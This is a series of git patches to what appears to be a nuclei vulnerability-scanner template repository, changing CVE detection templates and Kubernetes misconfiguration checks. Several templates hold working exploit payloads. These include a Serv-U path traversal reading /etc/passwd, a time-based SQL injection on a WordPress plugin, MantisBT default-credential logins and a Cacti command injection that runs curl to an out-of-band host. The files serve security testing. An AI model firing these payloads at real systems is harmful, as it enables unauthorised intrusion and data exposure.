"root:[x*]:0:0" + + - type: word + part: header + words: + - "Serv-U" + + - type: status + status: + - 200 From eb57f6b9aa5bfa06f8f30e439981bec97fe5cdab Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 15:34:51 +0530 Subject: [PATCH 0198/1841] add metadata --- http/cves/2024/CVE-2024-28995.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index 8bde715f67..ca605f7197 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -12,8 +12,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-28995 - https://x.com/stephenfewer/status/1801191416741130575 metadata: - shodan-query: verified: true + max-request: 1 + shodan-query: html:"Serv-U" tags: cve,cve2024,lfi,solarwinds,serv-u http: From 1a162601aee847f148bc7ebde4b6f89bc1a71402 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 15:41:30 +0530 Subject: [PATCH 0199/1841] support both windows & linux --- http/cves/2024/CVE-2024-28995.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index ca605f7197..054cd10ce6 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -20,9 +20,11 @@ info: http: - method: GET path: + - '{{BaseURL}}/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt' - '{{BaseURL}}/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd' - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: regex part: body @@ -30,10 +32,6 @@ http: - "root:[x*]:0:0" - type: word - part: header + part: body words: - - "Serv-U" - - - type: status - status: - - 200 + - "Serv-U File Server" From 738122868bc74258e60f83f26ebd095171a81fff Mon Sep 17 00:00:00 2001 From: Kristinn Vikar Date: Thu, 13 Jun 2024 11:01:17 +0000 Subject: [PATCH 0200/1841] remove redundant ATS matcher --- http/technologies/waf-detect.yaml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 9dbfc5f527..d4aac2ba32 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -156,14 +156,6 @@ http: condition: or part: response - - type: regex - name: ats - regex: - - '(?i)(\()?apachetrafficserver((\/)?\d+(.\d+(.\d+)?)?)' - - '(?i)ats((\/)?(\d+(.\d+(.\d+)?)?))?' - condition: or - part: response - - type: regex name: malcare regex: From 33a41a227a173ac6b69f0eec051814e64b9bd053 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 13 Jun 2024 15:47:43 +0300 Subject: [PATCH 0201/1841] add cve-2024-3552 --- http/cves/2024/CVE-2024-3552.yaml | 32 +++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3552.yaml diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml new file mode 100644 index 0000000000..f28018f4c9 --- /dev/null +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -0,0 +1,32 @@ +id: CVE-2024-3552 + +info: + name: Web Directory Free < 1.7.0 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based. + remediation: Fixed in 1.7.0 + reference: + - https://vulners.com/wpvulndb/CVE-2024-3552 + - https://wpscan.com/vulnerability/34b03ee4-de81-4fec-9f3d-e1bd5b94d136/ + metadata: + publicwww-query: "/wp-content/plugins/web-directory-free" + tags: wpscan,cve,cve2024,wordpress,wp-plugin,sqli + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(4),0)+from+(select+1)x) + + matchers: + - type: dsl + dsl: + - 'duration>=4' + - 'contains(body, "[]")' + - 'status_code == 200' + condition: and From b1d6926bbbe9bffb89b7e1efc5583d9db4fbc33e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 19:01:32 +0530 Subject: [PATCH 0202/1841] Update mantisbt-default-credential.yaml --- .../mantisbt/mantisbt-default-credential.yaml | 44 ++++++++++++++----- 1 file changed, 33 insertions(+), 11 deletions(-) diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 079862ba31..7b27e083bf 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -2,7 +2,7 @@ id: mantisbt-default-credential info: name: MantisBT Default Admin Login - author: For3stCo1d + author: For3stCo1d,YashVardhanTripathi severity: high description: A MantisBT default admin login was discovered. reference: @@ -19,29 +19,51 @@ info: http: - raw: - | - POST /login.php HTTP/1.1 + GET /login_password_page.php HTTP/1.1 Host: {{Hostname}} + - | + POST /login_password_page.php HTTP/1.1 + Host: {{Hostname}} + Cookie: MANTIS_secure_session=1; PHPSESSID={{session}} Content-Type: application/x-www-form-urlencoded - return=index.php&username={{user}}&password={{pass}} + return=index.php&username={{username}} + - | + POST /login_password_page.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: MANTIS_secure_session=1; PHPSESSID={{session}} + + return=index.php&username={{username}}&password={{password}}&secure_session=on + - | + GET /bugs/my_view_page.php HTTP/1.1 + Host: {{Hostname}} attack: pitchfork payloads: - user: + username: - administrator - pass: + password: - root matchers-condition: and matchers: - - type: dsl - dsl: - - contains(tolower(header), 'mantis_secure_session') - - contains(tolower(header), 'mantis_string_cookie') + - type: word + part: body_4 + words: + - "View Issues" + - "Change Log" condition: and - type: status status: - - 302 + - 200 -# digest: 490a0046304402205e3ba9080530721f7904ce8e6d98318f860b18d800d06370ccfd841b5de6ee8402201f73aac2837cd43bb2116deeddecd4ec504277ed0698a77d7c40c2a67bcf78b7:922c64590222798bb761d5b6d8e72950 + extractors: + - type: regex + name: session + internal: true + group: 1 + part: header + regex: + - "PHPSESSID=([a-zA-Z0-9]+);" From 295ecc40676ad8c955943b068d91d51e191fb383 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 19:05:58 +0530 Subject: [PATCH 0203/1841] Update mantisbt-default-credential.yaml --- http/default-logins/mantisbt/mantisbt-default-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 7b27e083bf..335c42ab6f 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -36,7 +36,7 @@ http: return=index.php&username={{username}}&password={{password}}&secure_session=on - | - GET /bugs/my_view_page.php HTTP/1.1 + GET /my_view_page.php HTTP/1.1 Host: {{Hostname}} attack: pitchfork From 7eb814d4e6ef0a27e87a66609322b1497a37e508 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 19:11:12 +0530 Subject: [PATCH 0204/1841] metadata - update --- http/cves/2024/CVE-2024-28995.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index 054cd10ce6..0f99ea37cf 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -15,6 +15,7 @@ info: verified: true max-request: 1 shodan-query: html:"Serv-U" + fofa-query: app="Serv-U-FTP" tags: cve,cve2024,lfi,solarwinds,serv-u http: From 685ab11f837fa9a8d2bef388d6fe5d6ffe7241fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 13 Jun 2024 19:45:14 +0530 Subject: [PATCH 0205/1841] Update CVE-2024-28995.yaml --- http/cves/2024/CVE-2024-28995.yaml | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index 0f99ea37cf..fc166b2662 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -27,12 +27,16 @@ http: stop-at-first-match: true matchers-condition: or matchers: - - type: regex - part: body - regex: - - "root:[x*]:0:0" + - type: dsl + dsl: + - "contains(header_1, 'Server: Serv-U')" + - 'contains(body_1, "Serv-U File Server")' + - "status_code_1 == 200" + condition: and - - type: word - part: body - words: - - "Serv-U File Server" + - type: dsl + dsl: + - "contains(header_2, 'Server: Serv-U')" + - "regex('root:.*:0:0:', body_2)" + - "status_code_2 == 200" + condition: and From 61fb263effc2e62ece3a55e9ecb9d58a496f5970 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 16:53:55 +0000 Subject: [PATCH 0206/1841] Auto Generated New Template Addition List [Thu Jun 13 16:53:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fb8f57525c..c404334baa 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml From 2fe6f31cdd3b1ad0a64b29c0bcb4c79f999f5dec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 16:54:02 +0000 Subject: [PATCH 0207/1841] Auto Generated Templates Checksum [Thu Jun 13 16:54:02 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5f5bff4e48..02bc8e867b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3323,6 +3323,7 @@ http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 +http/cves/2024/CVE-2024-37393.yaml:20d877ad8786073ac602c19cd95eacb4f8d73436 http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -8516,7 +8517,7 @@ network/detection/java-rmi-detect.yaml:202bcdc6fc13b2561933d98e8cf75f5e917d7022 network/detection/microsoft-ftp-service.yaml:5fc5a60ea61d8ff29b095a40b56f87abf66a9156 network/detection/mikrotik-ftp-server-detect.yaml:7d148ba7b6af4f9fb78d22ce3ee05f5491cdf0ad network/detection/mikrotik-routeros-api.yaml:6e99f2d3e5df1ac249846d83206f9eeb2732bbd3 -network/detection/mikrotik-ssh-detect.yaml:d7534e41b5b44a31dd978c98655d003f5e00e266 +network/detection/mikrotik-ssh-detect.yaml:0463c072e51b4f76a35ccac28762fe5014810e9a network/detection/mongodb-detect.yaml:35a026591de560092a2bd5d74f0a3eb50e9fda80 network/detection/moveit-sftp-detect.yaml:234b9d11a7f66f35140c7c083b613a31f3a58dea network/detection/msmq-detect.yaml:ba00026ecd1bd7b2a4faa69d374d4711603bd6b0 @@ -8645,7 +8646,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:279c7b38610f8eec9580bf2fe6360756da75e268 +templates-checksum.txt:73a443496d5bda8552e1e38ab4b09951ff8b0139 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 56ba7eee1d810f02372499356293530586bcbaf9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 13 Jun 2024 16:54:47 +0000 Subject: [PATCH 0208/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d70a8d262c..a7dd741cba 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' From 55aa46ad954013889492a3ed75c818cc80cbe903 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 13 Jun 2024 16:55:46 +0000 Subject: [PATCH 0209/1841] Auto Template Signing [Thu Jun 13 16:55:46 UTC 2024] :robot: --- http/cves/2024/CVE-2024-37393.yaml | 1 + http/misconfiguration/apache/apache-server-status-localhost.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-37393.yaml b/http/cves/2024/CVE-2024-37393.yaml index 89a460c535..4132913e7c 100644 --- a/http/cves/2024/CVE-2024-37393.yaml +++ b/http/cves/2024/CVE-2024-37393.yaml @@ -48,3 +48,4 @@ http: - "contains(body_2, 'GETPASSCODE')" - "status_code_2 == 200" condition: and +# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/apache/apache-server-status-localhost.yaml b/http/misconfiguration/apache/apache-server-status-localhost.yaml index 0f188f89e8..62f9906403 100644 --- a/http/misconfiguration/apache/apache-server-status-localhost.yaml +++ b/http/misconfiguration/apache/apache-server-status-localhost.yaml @@ -49,3 +49,4 @@ http: - "Apache Server Status" - "Server Version" condition: and +# digest: 490a004630440220214c8dd0248d477eb1c3ec246de7bbc8d86f0f451e94ccda36dbf4d68dba3f9a02203aa635a6fc63cd19f76bd66a62a2a80b2d34a6c30c44ea0d7a1994ee72c2c8c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 60370f59f83e106670ae9db21b37a4c2a10ad0a6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 13 Jun 2024 22:27:56 +0530 Subject: [PATCH 0210/1841] Update CVE-2024-29895.yaml --- http/cves/2024/CVE-2024-29895.yaml | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-29895.yaml b/http/cves/2024/CVE-2024-29895.yaml index cea5a8cd54..0a3c4f53fe 100644 --- a/http/cves/2024/CVE-2024-29895.yaml +++ b/http/cves/2024/CVE-2024-29895.yaml @@ -30,14 +30,19 @@ info: http: - method: GET path: - - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1" + - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1" matchers-condition: and matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" - type: status status: From d7c6e2f33d185ac2b8c6cce0e765968fcffc191e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 14 Jun 2024 09:57:21 +0400 Subject: [PATCH 0211/1841] updated templates --- .../deployments/k8s-privileged-container.yaml | 18 +++++++++++------- .../k8s-host-network-namespace-shared.yaml | 18 +++++++++--------- 2 files changed, 20 insertions(+), 16 deletions(-) rename cloud/kubernetes/{deployments => pods}/k8s-host-network-namespace-shared.yaml (52%) diff --git a/cloud/kubernetes/deployments/k8s-privileged-container.yaml b/cloud/kubernetes/deployments/k8s-privileged-container.yaml index f1a401bf82..b37e429c23 100644 --- a/cloud/kubernetes/deployments/k8s-privileged-container.yaml +++ b/cloud/kubernetes/deployments/k8s-privileged-container.yaml @@ -4,11 +4,11 @@ info: name: Privileged Containers Found in Deployments author: princechaddha severity: critical - description: Checks for containers running in privileged mode within Kubernetes Deployments, which can pose significant security risks. + description: Checks for containers running in privileged mode within Kubernetes Deployments, and now also checks for user privileges and privilege escalation settings. impact: | - Running containers in privileged mode grants them access to host resources and could lead to security breaches if the container is compromised. + Running containers in privileged mode, as the root user, or with privilege escalation enabled can grant them access to host resources and could lead to security breaches if the container is compromised. remediation: | - Ensure that no container in Kubernetes Deployments runs in privileged mode. Modify the security context for each container to set `privileged: false`. + Ensure that no container in Kubernetes Deployments runs in privileged mode, as the root user, or with privilege escalation enabled. Modify the security context for each container to set `privileged: false`, `runAsUser` appropriately, and `allowPrivilegeEscalation: false`. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged tags: cloud,devops,kubernetes,k8s,devsecops,deployments @@ -36,13 +36,17 @@ code: javascript: - code: | deployment = JSON.parse(template.deployment); - if (deployment.spec.template.spec.containers.some(container => container.securityContext && container.securityContext.privileged)) { - let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is running one or more containers in privileged mode.`); - Export(result); + for (let container of deployment.spec.template.spec.containers) { + let sc = container.securityContext || {}; + if (sc.privileged || sc.runAsUser < 1000 || sc.allowPrivilegeEscalation) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is running container '${container.name}' with insecure settings: Privileged=${sc.privileged}, runAsUser=${sc.runAsUser}, allowPrivilegeEscalation=${sc.allowPrivilegeEscalation}.`); + Export(result); + break; + } } extractors: - type: dsl dsl: - response -# digest: 4a0a00473045022100f896dc71c39119ecfd505a21a22dfcec6e06896f4d4b528cec13cf998181dd3902203458b94c2d0bf33603b64f5aa503123505a983941b01b9d0aada0b8985666044:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 490a00463044022038295a725d25b77f920cfd32a5a407220f8f9c5faa37544670696f4cea356434022027fd56a2feae1101fe03c0d2e6e2452a2a89947f5c14e9711b8a744d11368b1e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml similarity index 52% rename from cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml rename to cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml index 50c0440a14..6564d3b93f 100644 --- a/cloud/kubernetes/deployments/k8s-host-network-namespace-shared.yaml +++ b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml @@ -4,19 +4,19 @@ info: name: Host Network Namespace Sharing author: princechaddha severity: high - description: Checks if containers in Kubernetes Deployments are configured to share the host's network namespace, which can lead to security risks. + description: Checks if containers in Kubernetes Pods are configured to share the host's network namespace, which can lead to security risks. impact: | Sharing the host's network namespace allows containers to access the host network directly. This can lead to potential security breaches as containers might bypass network policies and gain unrestricted network access on the host. remediation: | - Ensure that the 'hostNetwork' field is set to false in all Kubernetes Deployments to prevent containers from sharing the host's network namespace. + Ensure that the 'hostNetwork' field is set to false in all Kubernetes Pods to prevent containers from sharing the host's network namespace. reference: - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces tags: cloud,devops,kubernetes,k8s,devsecops,namespace flow: | code(1); - for (let deployment of template.items) { - set("deployment", deployment) + for (let pod of template.items) { + set("pod", pod) javascript(1); } @@ -25,7 +25,7 @@ code: - engine: - sh - bash - source: kubectl get deployments --all-namespaces --output=json + source: kubectl get pods --all-namespaces --output=json extractors: - type: json name: items @@ -35,13 +35,13 @@ code: javascript: - code: | - deployment = JSON.parse(template.deployment); - if (deployment.spec.template.spec.hostNetwork) { - let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is configured to share the host's network namespace.`); + pod = JSON.parse(template.pod); + if (pod.spec.hostNetwork) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host's network namespace.`); Export(result); } extractors: - type: dsl dsl: - response -# digest: 4b0a00483046022100cd66750a4f7a5b20df75d62c2f9321edc46cac18cfd5599f45adc232248d3653022100dff978e8738723e829177c98c67e250a3fa1f9f5b8fa36db590af252c936ef73:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4b0a004830460221008eef4a8e8215cf69d36f0d94aa83b3531ce19730942b461b27842147f7f39973022100dfc800230845da0fe800dac62b006dc4a27d52a9b1684e7153165782e7d3472b:366f2a24c8eb519f6968bd8801c08ebe From a315e48241a8bb2478b3d66f861d7d786d927c44 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 14 Jun 2024 11:49:43 +0400 Subject: [PATCH 0212/1841] added network-policies templates --- .../deployments/k8s-cpu-limits-not-set.yaml | 2 +- .../deployments/k8s-host-ports-check.yaml | 50 +++++++++++++++++ .../k8s-image-pull-policy-always.yaml | 2 +- .../deployments/k8s-image-tag-not-fixed.yaml | 2 +- .../k8s-liveness-probe-not-configured.yaml | 2 +- .../k8s-memory-limits-not-set.yaml | 2 +- .../k8s-root-container-admission.yaml | 2 +- .../k8s-def-egress-rules.yaml | 48 ++++++++++++++++ .../k8s-network-ingress-rules.yaml | 47 ++++++++++++++++ .../network-policies/k8s-ns-policy-set.yaml | 55 +++++++++++++++++++ .../k8s-allow-privilege-escalation-set.yaml | 2 +- .../pods/k8s-containers-share-host-ipc.yaml | 2 +- .../k8s-host-network-namespace-shared.yaml | 2 +- .../pods/k8s-host-pid-namespace-sharing.yaml | 2 +- cloud/kubernetes/pods/k8s-readonly-fs.yaml | 1 + .../kubernetes/pods/k8s-readonly-rootfs.yaml | 50 +++++++++++++++++ cloud/kubernetes/pods/k8s-root-user-id.yaml | 49 +++++++++++++++++ 17 files changed, 310 insertions(+), 10 deletions(-) create mode 100644 cloud/kubernetes/deployments/k8s-host-ports-check.yaml create mode 100644 cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml create mode 100644 cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml create mode 100644 cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml create mode 100644 cloud/kubernetes/pods/k8s-readonly-rootfs.yaml create mode 100644 cloud/kubernetes/pods/k8s-root-user-id.yaml diff --git a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml index 1211e7285d..7daf55f8d7 100644 --- a/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml @@ -46,4 +46,4 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402205d1ddc90198898e6c233e5aac1742de397db7c2a70008e5fbc0676562a86894d0220088faf06d908f7d7dd8c9d0de8a20a120ed129962c78ce589abff2bc9402014a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 490a0046304402207794d2cf587203ba357f4376862e445b2f8612f8fb9eee2683d45f445f4a450d02206387d8f375f6157ef9ac572a2595210e717fef4fcd935b5a7f243f806bea47f4:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-host-ports-check.yaml b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml new file mode 100644 index 0000000000..0d8fb6bd3b --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-host-ports-check.yaml @@ -0,0 +1,50 @@ +id: k8s-host-ports-check + +info: + name: Host ports should not be used + author: princechaddha + severity: medium + description: Checks Kubernetes Deployments to ensure they are not configured to use host ports, which can expose the host to potential security risks. + impact: | + Using host ports can compromise the isolation between the host and the containers, increasing the risk of unauthorized access to host resources. This can lead to security breaches. + remediation: | + Avoid using host ports in Kubernetes Deployments. Use services or other networking mechanisms to expose container applications. + reference: + - https://kubernetes.io/docs/concepts/services-networking/service/ + tags: cloud,devops,kubernetes,security,devsecops,deployments + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {name: .metadata.name, namespace: .metadata.namespace, containers: .spec.template.spec.containers}' + +javascript: + - code: | + let deploymentData = JSON.parse(template.deployment); + deploymentData.containers.forEach(container => { + if (container.ports && container.ports.some(port => port.hostPort)) { + let result = (`Deployment '${deploymentData.name}' in namespace '${deploymentData.namespace}' uses host ports.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100f3a3753e5b3711de8e19eb7d96fe6cb9bbb71ea0d38975957c40c504f3469967022100c210bc6cb2adbcf0da1de9cd21c812ec890563c3cd8bb2edc76196cd311aecbd:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml index 0a4adf49b8..17c192b3af 100644 --- a/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml +++ b/cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml @@ -45,4 +45,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a004730450220107f47e2cbc8e9728548ec55c0d38b8a766eee58f47d2ef94709c87fb4080509022100b074dd509ae27478b66fa9d6157e952ce3f1764f66d70df3ad45afff361bf0cb:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4a0a0047304502200409430ae2d1311531b8e20737a1b5d8b93a3a57d0ddffa0003d34a99a4a06dd022100964eda202924507b711a38850dcae155eb2d3966b48557787e2c0e5a60c58e64:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml index 7fffa3f8be..989b5b2759 100644 --- a/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml +++ b/cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml @@ -49,4 +49,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100bd8016086ff77ceec6ef9605c3ceccd549832cca05a8682c4f3700baa158d0c7022042bb21d930467ea83c19d742cdb8a4c271c91267eb97375ac82cf945df9c27f6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4b0a00483046022100a73d7f300303791070156f087c9a729d56361a04a4c2f11adb16ce3c66addd30022100e1ecf1ead4985f23fdbe80dafb0954bc5c17be9d036573d2cd40494c1fcddd7e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml index 0b6043df6b..dc4f612553 100644 --- a/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml +++ b/cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml @@ -44,4 +44,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100e60638756964bc77d262b7457ee93f07c60fcfdfb8b8c9713be764334cba3d8e02210098435e5cb2898c8f1bbf07c33827dc5bde729593d17cbaa029e7acb9e7d55bda:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 490a0046304402200d2e45e711a22fa4ab57ff3065de5eb87f78aa2904b41e829e3566b04de8109e02206750a88213ad16e78ffaf03980b9b7a6994acb71bdebaf83292d6608fa07a130:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml index cfbf4e5252..c8d50de6d9 100644 --- a/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml +++ b/cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml @@ -44,4 +44,4 @@ javascript: - type: dsl dsl: - response -# digest: 490a0046304402205488e0d1d8975da93c8879b2f4a090004db84f9a75618b7454a62edc8b0b6c2202207555edc45bffad32c1d89b0e68ebbd836a588de88a0e2f71f201fbda052d023e:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 